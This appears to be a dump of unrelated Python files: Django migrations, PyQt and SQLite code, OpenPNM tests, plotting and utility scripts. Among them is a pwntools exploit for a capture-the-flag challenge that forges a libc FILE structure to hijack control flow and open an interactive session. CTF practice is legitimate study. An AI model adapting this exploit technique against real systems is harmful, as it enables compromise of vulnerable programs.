legend1 = plt.legend(lxlist, dclablist, loc=2,fontsize=10,ncol=3)
plt.gca().add_artist(legend1)
#calorimetric line:
sfrref = np.power(10,np.linspace(-3,1.7))
Lgcal = sfrref*6e39
plt.plot(sfrref,Lgcal,color='k',ls='dashed')
plt.yscale('log')
plt.xscale('log')
plt.xlabel(r'${\rm SFR}\;{\rm [M_\odot/yr]}$', fontsize=20)
plt.ylabel(r'$L_{\gamma}$', fontsize=20)
plt.legend(loc=4,fontsize=10,ncol=2, numpoints=1)
figname=plotloc+'CRplot/SFRLg/SFRLg_'+fmeat+'_sn'+str(startno)+'_'+str(Nsnap)+'.pdf'
print 'figname', figname
plt.tick_params(axis='both', which='both',direction='in',bottom=True,top=True,left=True,right=True,labelsize=18)
plt.savefig(figname,bbox_inches='tight')
plt.clf()
|
# Generated by Django 3.0 on 2019-12-07 17:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Schedule',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('saleprice', models.PositiveIntegerField(default=100000)),
('rv', models.PositiveIntegerField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Step',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rank', models.PositiveSmallIntegerField(default=1)),
('amount', models.PositiveIntegerField(default=0)),
('number', models.PositiveSmallIntegerField(default=24)),
('periodicity', models.PositiveSmallIntegerField(choices=[(0, 'Months'), (3, 'Quarters'), (12, 'Years')], default=0)),
('mode', models.PositiveSmallIntegerField(choices=[(0, 'Find'), (1, 'Fixed')], default=0)),
('schedule', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='has_steps', to='quote.Schedule')),
],
),
]
|
#7. Write program to convert prefix/net mask to IP
subnet = 16
ones = [1]*subnet
b1 = ones[0:8]
b2 = ones[8:16]
b3 = ones[16:24]
b4 = ones[24:32]
lst = [b1, b2, b3, b4]
for j in range(4):
if(len(lst[j]) < 8):
x = 8 -len(lst[j])
y = 0
for i in range(x):
lst[j].append(y)
lst2 = []
for k in range(len(lst)):
add = 0
for mul in range(8):
add += lst[k][mul] * (2**(7-mul))
lst2.append(add)
print ' The IP for Net mak = %d is --> %s.%s.%s.%s'%(subnet,lst2[0],lst2[1],lst2[2],lst2[3])
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Nombre: recuperarImagen.py
# Autor: Miguel Andres Garcia Niño
# Creado: 07 de Mayo 2018
# Modificado: 07 de Mayo 2018
# Copyright: (c) 2018 by Miguel Andres Garcia Niño, 2018
# License: Apache License 2.0
# ----------------------------------------------------------------------------
__versión__ = "1.0"
"""
El módulo *recuperarImagen* permite mostrar una foto en un QLabel y un nombre de usuario
en un QLineEdit que están almacenados en una Base de Datos (SQLite).
"""
from os import getcwd
from sqlite3 import connect
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtCore import Qt, pyqtSignal, QByteArray, QIODevice, QBuffer
from PyQt5.QtWidgets import (QApplication, QDialog, QLabel, QPushButton, QFileDialog,
QLabel, QLineEdit)
# ===================== CLASE QLabelClickable ======================
class QLabelClickable(QLabel):
clicked = pyqtSignal()
def __init__(self, parent=None):
super(QLabelClickable, self).__init__(parent)
def mousePressEvent(self, event):
self.clicked.emit()
# ==================== CLASE recuperarImagen =======================
class recuperarImagen(QDialog):
def __init__(self, parent=None):
super(recuperarImagen, self).__init__(parent)
self.setWindowTitle("Recuperar imagen por: ANDRES NIÑO")
self.setWindowIcon(QIcon("icono.png"))
self.setWindowFlags(Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)
self.setFixedSize(400, 511)
self.initUI()
def initUI(self):
# ==================== WIDGET QLABEL =======================
self.labelImagen = QLabelClickable(self)
self.labelImagen.setGeometry(15, 15, 168, 180)
self.labelImagen.setToolTip("Imagen")
self.labelImagen.setCursor(Qt.PointingHandCursor)
self.labelImagen.setStyleSheet("QLabel {background-color: white; border: 1px solid "
"#01DFD7; border-radius: 2px;}")
self.labelImagen.setAlignment(Qt.AlignCenter)
# ==================== WIDGETS QLABEL ======================
labelNombre = QLabel("Nombre de usuario", self)
labelNombre.move(193, 15)
# ================== WIDGETS QLINEEDIT =====================
self.lineEditNombre = QLineEdit(self)
self.lineEditNombre.setGeometry(193, 30, 192, 25)
# ================= WIDGETS QPUSHBUTTON ====================
buttonSeleccionar = QPushButton("Seleccionar", self)
buttonSeleccionar.setToolTip("Seleccionar imagen")
buttonSeleccionar.setCursor(Qt.PointingHandCursor)
buttonSeleccionar.setGeometry(15, 200, 168, 25)
buttonBuscar = QPushButton("Buscar", self)
buttonBuscar.setToolTip("Buscar usuario")
buttonBuscar.setCursor(Qt.PointingHandCursor)
buttonBuscar.setGeometry(193, 60, 93, 25)
buttonGuardar = QPushButton("Guardar", self)
buttonGuardar.setToolTip("Guardar usuario")
buttonGuardar.setCursor(Qt.PointingHandCursor)
buttonGuardar.setGeometry(292, 60, 93, 25)
# ===================== EVENTO QLABEL ======================
# Llamar función al hacer clic sobre el label
self.labelImagen.clicked.connect(self.seleccionarImagen)
# ================== EVENTOS QPUSHBUTTON ===================
buttonSeleccionar.clicked.connect(self.seleccionarImagen)
buttonBuscar.clicked.connect(self.Buscar)
buttonGuardar.clicked.connect(self.Guardar)
# ======================= FUNCIONES ============================
def seleccionarImagen(self):
imagen, extension = QFileDialog.getOpenFileName(self, "Seleccionar imagen", getcwd(),
"Archivos de imagen (*.png *.jpg)",
options=QFileDialog.Options())
if imagen:
# Adaptar imagen
pixmapImagen = QPixmap(imagen).scaled(166, 178, Qt.KeepAspectRatio,
Qt.SmoothTransformation)
# Mostrar imagen
self.labelImagen.setPixmap(pixmapImagen)
def Buscar(self):
# Obtener nombre de usuario
nombre = " ".join(self.lineEditNombre.text().split()).title()
if nombre:
# Establecer conexión con la base de datos
conexion = connect("DB_USUARIOS.db")
cursor = conexion.cursor()
# Buscar usuario en la base de datos
cursor.execute("SELECT * FROM Usuarios WHERE NOMBRE = ?", (nombre,))
resultado = cursor.fetchone()
# Validar si se encontro algún resultado
if resultado:
# Cargar foto a un QPixmap
foto = QPixmap()
foto.loadFromData(resultado[1], "PNG", Qt.AutoColor)
# Insertar foto en el QLabel
self.labelImagen.setPixmap(foto)
# Insertar nombre de usuario en el QLineEdit
self.lineEditNombre.setText(resultado[0])
else:
self.labelImagen.clear()
print("El usuario {} no existe.".format(nombre))
# Cerrar la conexión con la base de datos
conexion.close()
self.lineEditNombre.setFocus()
else:
self.lineEditNombre.clear()
self.lineEditNombre.setFocus()
def Guardar(self):
pass
# ================================================================
if __name__ == '__main__':
import sys
aplicacion = QApplication(sys.argv)
ventana = recuperarImagen()
ventana.show()
sys.exit(aplicacion.exec_())
|
from mongoengine import Document, fields
# Create your models here.
class Certification(Document):
_id = fields.ObjectIdField(require=True)
user_id = fields.ObjectIdField(require=True)
org = fields.StringField(required=True)
name = fields.StringField(required=True)
tags = fields.ListField(required=True)
apply_time = fields.LongField(required=True)
deal_time = fields.LongField(required=True)
state = fields.StringField(require=True) # 通过的状态
_class = fields.StringField()
meta = {'collection' : 'Certification'}
class users(Document):
_id = fields.ObjectIdField(require=True)
email = fields.StringField(required=True)
userName = fields.StringField(required=True)
password = fields.StringField(required=True)
photo = fields.StringField(required=True)
point = fields.StringField(required=True)
type = fields.StringField(required=True)
favourites = fields.ListField(required=True)
_class = fields.StringField()
meta = {'collection' : 'users'}
|
import numpy as np
import scipy as sp
import OpenPNM
import pytest
def test_linear_solvers():
pn = OpenPNM.Network.Cubic([1, 40, 30], spacing=0.0001)
geom = OpenPNM.Geometry.Toray090(network=pn,
pores=pn.pores(),
throats=pn.throats())
air = OpenPNM.Phases.Air(network=pn)
phys_air = OpenPNM.Physics.Standard(network=pn,
phase=air,
pores=pn.pores(),
throats=pn.throats())
BC1_pores = pn.pores(labels=['left'])
BC2_pores = pn.pores(labels=['right'])
alg_1 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
alg_1.set_boundary_conditions(bctype='Dirichlet',
bcvalue=1,
pores=BC1_pores)
alg_1.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0,
pores=BC2_pores)
alg_1.run(iterative_solver='gmres')
alg_2 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
alg_2.set_boundary_conditions(bctype='Neumann',
bcvalue=-1e-11,
pores=BC1_pores)
alg_2.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0,
pores=BC2_pores)
alg_2.run(iterative_solver='cg')
alg_3 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
alg_3.set_boundary_conditions(bctype='Neumann_group',
bcvalue=-3e-10,
pores=BC1_pores)
alg_3.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0,
pores=BC2_pores)
alg_3.run()
alg_4 = OpenPNM.Algorithms.FickianDiffusion(network=pn, phase=air)
alg_4.set_boundary_conditions(bctype='Neumann_group',
bcvalue=-3e-10,
pores=BC1_pores)
alg_4.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0,
pores=BC2_pores)
alg_4.setup()
alg_4.solve()
assert round(sp.absolute(alg_1.rate(BC1_pores))[0], 16) == round(sp.absolute(alg_1.rate(BC2_pores))[0], 16)
assert round(sp.absolute(alg_2.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_2['pore.'+air.name+'_bcval_Neumann']))[0]*len(BC1_pores), 16)
assert round(sp.absolute(alg_3.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_3['pore.'+air.name+'_bcval_Neumann_group']))[0], 16)
assert round(sp.absolute(alg_4.rate(BC2_pores))[0], 16) == round(sp.absolute(sp.unique(alg_4['pore.'+air.name+'_bcval_Neumann_group']))[0], 16)
assert round(sp.absolute(sp.sum(alg_1.rate(BC1_pores,mode='single'))),16) == round(sp.absolute(alg_1.rate(BC1_pores))[0],16)
assert round(sp.absolute(sp.sum(alg_2.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_2.rate(BC2_pores))[0],16)
assert round(sp.absolute(sp.sum(alg_3.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_3.rate(BC2_pores))[0],16)
assert round(sp.absolute(sp.sum(alg_4.rate(BC2_pores,mode='single'))),16) == round(sp.absolute(alg_4.rate(BC2_pores))[0],16)
def test_add_boundary():
pn = OpenPNM.Network.Cubic(shape=[5, 5, 5])
pn.add_boundaries()
keys_expected = {'pore.back', 'pore.bottom', 'pore.top_boundary',
'pore.right_boundary', 'throat.back_boundary',
'throat.all', 'throat.bottom_boundary',
'throat.front_boundary', 'pore.boundary',
'throat.left_boundary', 'throat.conns',
'throat.top_boundary', 'pore.back_boundary', 'pore.top',
'pore.front_boundary', 'pore.all', 'pore.front',
'pore.left_boundary', 'throat.boundary',
'pore.bottom_boundary', 'throat.right_boundary',
'pore.coords', 'pore.internal', 'pore.index', 'pore.left',
'pore.right'}
keys_found = set(pn.keys())
symmetric_diff = keys_found ^ keys_expected
assert not symmetric_diff
def test_open_air_diffusivity():
pn = OpenPNM.Network.Cubic([5, 5, 5], spacing=1)
pn.add_boundaries()
Ps = pn.pores('boundary', mode='not')
Ts = pn.find_neighbor_throats(pores=Ps, mode='intersection', flatten=True)
geom = OpenPNM.Geometry.Cube_and_Cuboid(network=pn, pores=Ps, throats=Ts)
geom['pore.diameter'] = 0.999999
geom['throat.diameter'] = 0.999999
geom.regenerate(['pore.diameter', 'throat.diameter'], mode='exclude')
Ps = pn.pores('boundary')
Ts = pn.find_neighbor_throats(pores=Ps, mode='not_intersection')
boun = OpenPNM.Geometry.Boundary(network=pn,
pores=Ps,
throats=Ts,
shape='cubes')
air = OpenPNM.Phases.Air(network=pn)
Ps = pn.pores()
Ts = pn.throats()
phys_air = OpenPNM.Physics.Standard(network=pn,
phase=air,
pores=Ps,
throats=Ts)
BC1_pores = pn.pores(labels=['top_boundary'])
BC2_pores = pn.pores(labels=['bottom_boundary'])
Diff = OpenPNM.Algorithms.FickianDiffusion(network=pn,
phase=air)
# Assign Dirichlet boundary conditions to top and bottom surface pores
Diff.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0.6,
pores=BC1_pores)
Diff.set_boundary_conditions(bctype='Dirichlet',
bcvalue=0.4,
pores=BC2_pores)
Diff.run()
Diff.return_results()
Diff_deff = Diff.calc_eff_diffusivity()/np.mean(air['pore.diffusivity'])
assert np.round(Diff_deff, 3) == 1
def test_thermal_conduction():
# Generate Network and clean up boundaries (delete z-face pores)
divs = [10, 50]
Lc = 0.1 # cm
pn = OpenPNM.Network.Cubic(shape=divs, spacing=Lc)
pn.add_boundaries()
pn.trim(pores=pn.pores(['top_boundary', 'bottom_boundary']))
# Generate Geometry objects for internal and boundary pores
Ps = pn.pores('internal')
Ts = pn.throats()
geom = OpenPNM.Geometry.GenericGeometry(network=pn,
pores=Ps,
throats=Ts)
geom['pore.area'] = Lc**2
geom['pore.diameter'] = Lc
geom['throat.length'] = 1e-25
geom['throat.area'] = Lc**2
Ps = pn.pores('boundary')
boun = OpenPNM.Geometry.GenericGeometry(network=pn, pores=Ps)
boun['pore.area'] = Lc**2
boun['pore.diameter'] = 1e-25
# Create Phase object and associate with a Physics object
Cu = OpenPNM.Phases.GenericPhase(network=pn)
Cu['pore.thermal_conductivity'] = 1.0 # W/m.K
phys = OpenPNM.Physics.GenericPhysics(network=pn,
phase=Cu,
pores=pn.pores(),
throats=pn.throats())
mod = OpenPNM.Physics.models.thermal_conductance.series_resistors
phys.add_model(propname='throat.thermal_conductance', model=mod)
phys.regenerate() # Update the conductance values
# Setup Algorithm object
Fourier_alg = OpenPNM.Algorithms.FourierConduction(network=pn, phase=Cu)
inlets = pn.pores('back_boundary')
outlets = pn.pores(['front_boundary', 'left_boundary', 'right_boundary'])
T_in = 30*sp.sin(sp.pi*pn['pore.coords'][inlets, 1]/5)+50
Fourier_alg.set_boundary_conditions(bctype='Dirichlet',
bcvalue=T_in,
pores=inlets)
Fourier_alg.set_boundary_conditions(bctype='Dirichlet',
bcvalue=50,
pores=outlets)
Fourier_alg.run()
Fourier_alg.return_results()
# Calculate analytical solution over the same domain spacing
Cu['pore.analytical_temp'] = 30*sp.sinh(sp.pi*pn['pore.coords'][:, 0]/5)/sp.sinh(sp.pi/5)*sp.sin(sp.pi*pn['pore.coords'][:, 1]/5) + 50
b = Cu['pore.analytical_temp'][pn.pores(geom.name)]
a = Cu['pore.temperature'][pn.pores(geom.name)]
a = sp.reshape(a, (divs[0], divs[1]))
b = sp.reshape(b, (divs[0], divs[1]))
diff = a - b
assert sp.amax(np.absolute(diff)) < 0.015
def test_Darcy_alg():
# Generate Network and clean up some of boundaries
divs = [1, 50, 10]
Lc = 0.00004
pn = OpenPNM.Network.Cubic(shape=divs, spacing=Lc)
pn.add_boundaries()
Ps = pn.pores(['front_boundary', 'back_boundary'])
pn.trim(pores=Ps)
# Generate Geometry objects for internal and boundary pores
Ps = pn.pores('boundary', mode='not')
Ts = pn.find_neighbor_throats(pores=Ps, mode='intersection', flatten=True)
geom = OpenPNM.Geometry.Toray090(network=pn, pores=Ps, throats=Ts)
Ps = pn.pores('boundary')
Ts = pn.find_neighbor_throats(pores=Ps, mode='not_intersection')
boun = OpenPNM.Geometry.Boundary(network=pn, pores=Ps, throats=Ts)
# Create Phase object and associate with a Physics object
air = OpenPNM.Phases.Air(network=pn)
Ps = pn.pores()
Ts = pn.throats()
phys = OpenPNM.Physics.GenericPhysics(network=pn,
phase=air,
pores=Ps,
throats=Ts)
from OpenPNM.Physics import models as pm
phys.add_model(propname='throat.hydraulic_conductance',
model=pm.hydraulic_conductance.hagen_poiseuille,
calc_pore_len=False)
phys.regenerate() # Update the conductance values
# Setup Algorithm objects
Darcy1 = OpenPNM.Algorithms.StokesFlow(network=pn, phase=air)
inlets = pn.pores('bottom_boundary')
Ps = pn.pores('top_boundary')
outlets = Ps[pn['pore.coords'][Ps, 1] < (divs[1]*Lc/2)]
P_out = 0 # Pa
Q_in = 0.6667*(Lc**2)*divs[1]*divs[0] # m^3/s
Darcy1.set_boundary_conditions(bctype='Neumann_group',
bcvalue=-Q_in,
pores=inlets)
Darcy1.set_boundary_conditions(bctype='Dirichlet',
bcvalue=P_out,
pores=outlets)
Darcy1.run()
Darcy1.return_results()
print('pore pressure for Darcy1 algorithm:')
print(air['pore.pressure'])
Darcy2 = OpenPNM.Algorithms.StokesFlow(network=pn, phase=air)
inlets = pn.pores('bottom_boundary')
outlets = pn.pores('top_boundary')
P_out = 10 # Pa
P_in = 1000 # Pa
Darcy2.set_boundary_conditions(bctype='Dirichlet',
bcvalue=P_in,
pores=inlets)
Darcy2.set_boundary_conditions(bctype='Dirichlet',
bcvalue=P_out,
pores=outlets)
Darcy2.run()
print('pore pressure for Darcy2 algorithm:')
print(Darcy2['pore.'+air.name+'_pressure'])
Q = -Darcy2.rate(inlets)
K = Q*air['pore.viscosity'][0]*divs[2]*Lc/(divs[0]*divs[1]*Lc**2*(P_in-P_out))
Vp = sp.sum(pn['pore.volume']) + sp.sum(pn['throat.volume'])
Vb = sp.prod(divs)*Lc**3
e = Vp/Vb
print('Effective permeability: ', K, '- Porosity: ', e)
a = round(sp.absolute(Darcy1.rate(outlets))[0], 16)
pore_prop = 'pore.'+air.name+'_bcval_Neumann_group'
b = round(sp.absolute(sp.unique(Darcy1[pore_prop]))[0], 16)
assert a == b
a = round(sp.absolute(Darcy2.rate(inlets))[0], 16)
b = round(sp.absolute(Darcy2.rate(outlets))[0], 16)
assert a == b
|
/home/miaojian/miniconda3/lib/python3.7/_bootlocale.py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: cg错过
# time : 2017-12-08
class DataTemplate:
# data数据模板
# 程序运行得到的数据将不再存放到txt文件中,而是存放到此模板中,即内存中
def __init__(self, strDateTime, strServerName):
# 添加标识self.strServerName-add in 2018-04-09
self.dataForHour = ""
self.dataForSecond = ""
self.dataAll = ""
self.strDateTime = strDateTime
self.strServerName = strServerName
def createDictTextData(self):
# 创建一个普通的文本dict数据,并返回
strDataContent = (self.dataAll + "> \r\r " + self.strServerName + '-' + self.strDateTime)
dictData = {
"msgtype": "text",
"text": {
"content": strDataContent
},
"isAtAll": 'true'
}
return dictData
def createMarkdownData(self):
# 创建一个markdown语法的dict数据,并返回
strDataContentMark = (self.dataAll + "> \r\r " + self.strServerName + '-' + self.strDateTime)
dictData = {
"msgtype": "markdown",
"markdown": {
"title": "监控服务",
"text": "#### [监控服务]\n" + strDataContentMark
},
"at": {
"isAtAll": 'true'
}
}
return dictData
def createMarkdownDataForEmail(self):
# 创建一个markdown语法的数据,并返回
strDataContentMark = (self.dataAll + "> \r\r " + self.strServerName + '-' + self.strDateTime)
return strDataContentMark
|
# Generated by Django 3.2.4 on 2021-06-09 01:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('itens', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Avaliacao',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(auto_now=True, verbose_name='Data de Criação')),
('valor', models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], verbose_name='Avaliação')),
('avaliacao', models.CharField(max_length=200, null=True, verbose_name='Comentário')),
('likes_cont', models.IntegerField(default=0, verbose_name='Número Likes')),
('tipo', models.CharField(max_length=200, verbose_name='Tipo')),
('filme', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.filme')),
('livro', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.livro')),
('serie', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='itens.serie')),
('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
],
options={
'verbose_name': 'Avaliação',
'verbose_name_plural': 'Avaliações',
},
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('data_criacao', models.DateTimeField(auto_now=True)),
('comentario', models.TextField(max_length='1024', verbose_name='Comentario')),
('avaliacao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.avaliacao', verbose_name='avaliacao')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Comentário',
'verbose_name_plural': 'Comentários',
},
),
migrations.CreateModel(
name='LikeComentario',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comentario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.comentario')),
('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
],
options={
'verbose_name': 'Like',
'verbose_name_plural': 'Likes',
},
),
migrations.CreateModel(
name='LikeAvaliacao',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('avaliacao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='avaliacoes.avaliacao')),
('user_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user_id')),
],
options={
'verbose_name': 'Like',
'verbose_name_plural': 'Likes',
},
),
]
|
from pwn import *
import sys
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./chall"
#"""
HOST = "pwn.kosenctf.com"
PORT = 9003
"""
HOST = "localhost"
PORT = 7777
#"""
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
off_win = 0xa5a
off_buf = 0x202060
off_stream = 0x202260
def exploit():
conn.recvuntil("> = ")
addr_win = int(conn.recvline(), 16)
bin_base = addr_win - off_win
addr_buf = bin_base + off_buf
fake_file = p64(0xfbad2498) # _flags
#fake_file = p64(0xfbad0498) # _flags
fake_file += p64(addr_buf+0x150) # _read_ptr
fake_file += p64(addr_buf+0x150) # _read_end
fake_file += p64(addr_buf+0x150) # _read_base
fake_file += p64(addr_buf+0x150) # _write_base
fake_file += p64(addr_buf+0x150) # _write_ptr
fake_file += p64(addr_buf+0x150) # _write_end
fake_file += p64(addr_buf+0x150) # _buf_base
fake_file += p64(addr_buf+0x150) # _buf_end
fake_file += p64(0)*4 # hoge
fake_file += p64(addr_buf) # *_chain
fake_file += p64(3) # _fileno
fake_file += p64(0)*2 # hoge
fake_file += p64(addr_buf+0xe0) # lock
fake_file += p64(0xffffffffffffffff) #
fake_file += p64(0) # hoge
fake_file += p64(addr_buf) # hoge
fake_file += p64(0)*3 # hoge
fake_file += p64(0xffffffff)
fake_file += p64(0)*2 # hoge
fake_file += p64(addr_buf+0x100) # vtable
fake_file += "\x00"*(0x100-len(fake_file))
fake_file += p64(addr_win)*20
fake_file += "\x00"*(0x200-len(fake_file))
fake_file += p64(addr_buf)
fake_file += p64(0)*5
fake_file += p64(addr_buf)
conn.sendline(fake_file)
print hex(bin_base)
conn.interactive()
if __name__ == "__main__":
exploit()
|
import zmq
import os
from time import sleep
# -*-*config*-*-
work_ip = '0.0.0.0' # Принемать конекты с ip
port = '18735'
channel = 'sms' # Канал для отправки сообщений
command = 'poweroff' # Команды которая будет послана системе
mess_in = 'power off' # Какую команду надо получить чтобы выполнить "command"
# -*-*config*-*-
context = zmq.Context()
while True:
sleep(1)
# # Подпищик (Клиент)
# from time import sleep
# import zmq
# context = zmq.Context()
# socket = context.socket(zmq.SUB)
# socket.connect('tcp://127.0.0.1:13555')
# # socket.setsockopt(zmq.SUBSCRIBE, [b'test', b'sms'])
# socket.subscribe('sms')
# socket.subscribe('ping')
# # socket.recv_multipart()
# socket.recv_multipart(flags=zmq.NOBLOCK)
# while True:
# print(socket.recv_multipart()) |
# Generated by Django 2.2.1 on 2019-08-22 17:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BillHeader',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True)),
('date_submitted', models.DateTimeField(null=True)),
('submitted', models.BooleanField(default=False)),
('company_name', models.CharField(max_length=100)),
('street_address', models.CharField(default='123 Internet Street', max_length=100)),
('city', models.CharField(default='Downtown', max_length=100)),
('state', models.CharField(choices=[('AL', 'AL'), ('AK', 'AK'), ('AZ', 'AZ'), ('AR', 'AR'), ('CA', 'CA'), ('CO', 'CO'), ('CT', 'CT'), ('DE', 'DE'), ('FL', 'FL'), ('GA', 'GA'), ('HI', 'HI'), ('ID', 'ID'), ('IL', 'IL'), ('IN', 'IN'), ('IA', 'IA'), ('KS', 'KS'), ('KY', 'KY'), ('LA', 'LA'), ('ME', 'ME'), ('MD', 'MD'), ('MA', 'MA'), ('MI', 'MI'), ('MN', 'MN'), ('MS', 'MS'), ('MO', 'MO'), ('MT', 'MT'), ('NE', 'NE'), ('NV', 'NV'), ('NH', 'NH'), ('NJ', 'NJ'), ('NM', 'NM'), ('NY', 'NY'), ('NC', 'NC'), ('ND', 'ND'), ('OH', 'OH'), ('OK', 'OK'), ('OR', 'OR'), ('PA', 'PA'), ('RI', 'RI'), ('SC', 'SC'), ('SD', 'SD'), ('TN', 'TN'), ('TX', 'TX'), ('UT', 'UT'), ('VT', 'VT'), ('VA', 'VA'), ('WA', 'WA'), ('WV', 'WV'), ('WI', 'WI'), ('WY', 'WY'), ('', '')], default='CA', max_length=2)),
('phone', models.CharField(default='7601234567', max_length=10)),
('email', models.EmailField(default='billing@company.com', max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('name', models.CharField(max_length=100, primary_key=True, serialize=False)),
('street_address', models.CharField(default='123 Internet Street', max_length=100)),
('city', models.CharField(default='Downtown', max_length=100)),
('state', models.CharField(choices=[('AL', 'AL'), ('AK', 'AK'), ('AZ', 'AZ'), ('AR', 'AR'), ('CA', 'CA'), ('CO', 'CO'), ('CT', 'CT'), ('DE', 'DE'), ('FL', 'FL'), ('GA', 'GA'), ('HI', 'HI'), ('ID', 'ID'), ('IL', 'IL'), ('IN', 'IN'), ('IA', 'IA'), ('KS', 'KS'), ('KY', 'KY'), ('LA', 'LA'), ('ME', 'ME'), ('MD', 'MD'), ('MA', 'MA'), ('MI', 'MI'), ('MN', 'MN'), ('MS', 'MS'), ('MO', 'MO'), ('MT', 'MT'), ('NE', 'NE'), ('NV', 'NV'), ('NH', 'NH'), ('NJ', 'NJ'), ('NM', 'NM'), ('NY', 'NY'), ('NC', 'NC'), ('ND', 'ND'), ('OH', 'OH'), ('OK', 'OK'), ('OR', 'OR'), ('PA', 'PA'), ('RI', 'RI'), ('SC', 'SC'), ('SD', 'SD'), ('TN', 'TN'), ('TX', 'TX'), ('UT', 'UT'), ('VT', 'VT'), ('VA', 'VA'), ('WA', 'WA'), ('WV', 'WV'), ('WI', 'WI'), ('WY', 'WY'), ('', '')], default='CA', max_length=2)),
('phone', models.CharField(default='7601234567', max_length=10)),
('email', models.EmailField(default='billing@company.com', max_length=100)),
],
),
migrations.CreateModel(
name='BillLines',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(default='labor at $75/hour')),
('quantity', models.IntegerField()),
('unit_price', models.DecimalField(decimal_places=2, max_digits=10000)),
('header', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='billing.BillHeader')),
],
),
]
|
#!/usr/bin/python3
def isint(x):
try:
int(x)
return True
except ValueError:
return False
def isfloat(x):
try:
float(x)
return True
except ValueError:
return False
def isindex(name, index):
try:
name[index]
return True
except IndexError:
return False
def single_input_float(prompt):
# Take an input and only accept it when it is a float.
# This prevents the user from entering non-numbers where numbers
# are needed.
while True:
value = input(prompt)
if isfloat(value):
return float(value)
def single_input_int(prompt):
# Take an input and only accept it when it is an int.
# This prevents the user from entering non-numbers where numbers
# are needed.
while True:
value = input(prompt)
if isint(value):
return int(value)
def list_input_float(var):
# Starting at var (usually set to 0), continuously prompt the user
# for numbers, adding those values to var until the user types
# something that isn't a number.
while True:
value = input("")
if isfloat(value):
var += float(value)
else:
return var
def list_input_string():
# Prompt the user for strings until an empty string is entered.
# For each string, add it to an array to be output.
array = []
while True:
value = input("")
if value != "":
array.append(value)
else:
return array
|
## Python 3
answer = sum(filter(lambda x: x % 3 == 0 or x % 5 == 0, list(range(1000))))
print("The answer is %d" % answer)
|
import git
from VersionDetermination.MergeDetector.MergeDetector import MergeDetector
from VersionDetermination.LastVersionDetector.LastVersionDetector import LastVersionDetector
# https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-log.html#_pretty_formats
class Main(object):
def __init__(self, repository: str):
self.__repository_path = repository
self.__repository = git.Repo(repository)
last_version = LastVersionDetector(repository)
MergeDetector(repository)
print(last_version.major_version)
print(last_version.minor_version)
print(last_version.patch_version)
pass
